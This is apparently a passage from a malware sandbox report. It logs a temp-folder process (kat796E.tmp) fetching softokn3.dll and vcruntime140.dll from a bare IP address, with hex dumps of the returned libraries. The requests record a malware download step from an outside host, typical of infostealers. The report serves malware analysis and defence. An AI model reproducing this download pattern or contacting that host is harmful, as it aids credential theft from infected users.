                                                                              2024-05-26 08:23:34 UTC16384INData Raw: 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 b2 00 00 8b 45 08 ff 70 1c 68 20 85 1c 10 eb
                                                                              Data Ascii: o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$hEph
                                                                              2024-05-26 08:23:34 UTC16384INData Raw: 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b 5c 24 18 89 d8 83 c0 04 68 fc 01 00 00 6a 00
                                                                              Data Ascii: h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$>D$>D$\$hj
                                                                              2024-05-26 08:23:34 UTC16384INData Raw: 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d ff ff ff 8b 10 8b 4d e8 83 c4 10 5e 5f 5b 5d
                                                                              Data Ascii: HukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-MmM^_[]
                                                                              2024-05-26 08:23:34 UTC16384INData Raw: f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01 74 09 85 ff 75 0a e9 69 03 00 00 c6 44 02
                                                                              Data Ascii: WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$RttuiD
                                                                              2024-05-26 08:23:34 UTC16384INData Raw: c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00 00 00 00 e9 36 f8 ff ff 8b 40 14 e9 d1 e9
                                                                              Data Ascii: D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$6@


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              24192.168.2.45268465.109.242.594436620C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-26 08:23:36 UTC174OUTGET /softokn3.dll HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                              Host: 65.109.242.59
                                                                              Cache-Control: no-cache
                                                                              2024-05-26 08:23:36 UTC246INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sun, 26 May 2024 08:23:36 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 257872
                                                                              Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                              Connection: close
                                                                              ETag: "6315a9f4-3ef50"
                                                                              Accept-Ranges: bytes
                                                                              2024-05-26 08:23:36 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00
                                                                              Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
                                                                              2024-05-26 08:23:36 UTC16384INData Raw: ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 f0 81 c4 08 01 00 00 5e 5f 5b 5d c3 8b 5d 0c c7
                                                                              Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP|*USWV1E0=(tM1(^_[]]
                                                                              2024-05-26 08:23:37 UTC16384INData Raw: ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 bf 4d 02 00 83 c4 04 a3 38 9a 03 10 ff 75 0c e8
                                                                              Data Ascii: kWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGPM8u
                                                                              2024-05-26 08:23:37 UTC16384INData Raw: 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 00 00 ba 01 e0 01 e0 33 11 be 01 f1 01 f1 33 71
                                                                              Data Ascii: AAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q33q
                                                                              2024-05-26 08:23:37 UTC16384INData Raw: 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 02 00 00 3d 21 40 00 00 0f 85 37 06 00 00 83 7c
                                                                              Data Ascii: !=P=Qt-=Rt=UG{{G|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#=!@7|
                                                                              2024-05-26 08:23:37 UTC16384INData Raw: 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 00 74 8a eb 18 83 c7 60 8b 07 89 01 31 db e9 7a
                                                                              Data Ascii: 1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=Pt`1z
                                                                              2024-05-26 08:23:37 UTC16384INData Raw: d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83 c4 04 56 e8 78 4d 01 00 83 c4 04 83 fb 40 bf
                                                                              Data Ascii: EGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZVxM@
                                                                              2024-05-26 08:23:37 UTC16384INData Raw: 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 ba 83 01 00 00 0f a3 f2 73
                                                                              Data Ascii: H8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.s
                                                                              2024-05-26 08:23:37 UTC16384INData Raw: cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c 03 10 83 c4 04 83 7e 0c 00 0f 88 8b 02 00
                                                                              Data Ascii: USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4|~
                                                                              2024-05-26 08:23:37 UTC16384INData Raw: 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18 85 f6 75 a1 8b 4b 14 ff 15 00 a0 03 10 ff
                                                                              Data Ascii: <^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%uK


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              25192.168.2.45268565.109.242.594436620C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-26 08:23:38 UTC178OUTGET /vcruntime140.dll HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                              Host: 65.109.242.59
                                                                              Cache-Control: no-cache
                                                                              2024-05-26 08:23:38 UTC245INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sun, 26 May 2024 08:23:38 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 80880
                                                                              Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                              Connection: close
                                                                              ETag: "6315a9f4-13bf0"
                                                                              Accept-Ranges: bytes
                                                                              2024-05-26 08:23:38 UTC16139INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22
                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"
                                                                              2024-05-26 08:23:38 UTC16384INData Raw: ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c 3b 42 0c 74 4f 0f b6 f8 0f b6 42 0c 2b f8 75 18
                                                                              Data Ascii: NB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u
                                                                              2024-05-26 08:23:38 UTC16384INData Raw: 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 74 20 85 ff 74 1c 8b 45 f8 89 07 8b 45 fc 89 47
                                                                              Data Ascii: Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMGt tEEG
                                                                              2024-05-26 08:23:38 UTC16384INData Raw: 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f 85 12 ff ff ff 42 89 15 90 f2 00 10 8b f2 8a 0a
                                                                              Data Ascii: t@++t+t+u+uQ<0|*<9&w/c5~bASJCtvB
                                                                              2024-05-26 08:23:38 UTC15589INData Raw: ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f 66 74 20 43 6f 64 65 20 53 69 67 6e 69 6e
                                                                              Data Ascii: |5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicrosoft Code Signin


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
